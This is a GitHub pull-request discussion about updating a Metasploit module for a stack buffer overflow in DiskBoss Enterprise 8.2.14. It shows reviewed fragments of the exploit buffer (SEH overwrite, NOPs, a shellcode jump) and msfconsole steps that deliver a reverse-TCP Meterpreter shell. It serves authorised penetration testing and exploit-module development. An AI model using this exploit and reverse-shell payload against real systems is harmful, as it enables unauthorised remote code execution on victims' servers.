New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Update DiskBoss Module (EDB 42395) #9268
Update DiskBoss Module (EDB 42395) #9268
Conversation
Added a new target option for the DiskBoss Server.
'vportal', # Vulnerability discovery and PoC | ||
'Gabor Seljan', # Metasploit module | ||
'Ahmad Mahfouz', # Vulnerability discovery and PoC | ||
'Jacob Robles' # Metasploit module |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'd reorder to put your name next to Gabor's.
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit << [mytarget.ret].pack('V') | ||
sploit << rand_text_alpha(2500) | ||
if !(mytarget == targets[3]) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
How about rewriting this to use positive logic?
if mytarget == targets[3]
do_some_stuff
else
do_some_other_stuff
end
sploit << make_nops(10) | ||
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode | ||
sploit << rand_text_alpha(5000 - sploit.length) | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Nix this newline when you refactor.
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length) | ||
sploit[sploit.length, seh.length] = seh | ||
sploit << make_nops(10) | ||
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
How about Rex::Arch::X86.jmp(0xffffbf25)
and document what the address is?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I took a note to look this up and add it later, will land for now. Thx!
Verified fine for me:
Looks good and thanks, @jrobles-r7! If you wouldn't mind updating the PR with @wvu-r7's feedback whenever is convenient, I can do one more quick verify and land. |
I went ahead and made the requested review changes, all except updating the comment to reflect info about the address being JMP'd to. |
@@ -127,21 +127,23 @@ def exploit | |||
print_status("Selected Target: #{mytarget.name}") | |||
end | |||
|
|||
if !(mytarget == targets[3]) | |||
case mytarget |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Even better!
Release NotesThis patch updates the DiskBoss Enterprise buffer overflow exploit module to also work with v8.2.14. |
Added a new target option for the
DiskBoss Server.
This is an MSF port of https://www.exploit-db.com/exploits/42395/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise version 8.2.14. The vulnerable application is available for download at https://www.exploit-db.com/apps/7e7d6455ada0833b6bf11167e43977df-diskbossent_setup_v8.2.14.exe.
Verification
DiskBoss Enterprise
serviceDiskBoss Enterprise
client applicationTools
>DiskBoss Server Options
>Server
Enable Web Server On Port 80
to start the web interfacemsfconsole
use exploit/windows/http/diskboss_get_bof
set rhost <target IP>
check
set payload windows/meterpreter/reverse_tcp
set lhost <framework system IP>
run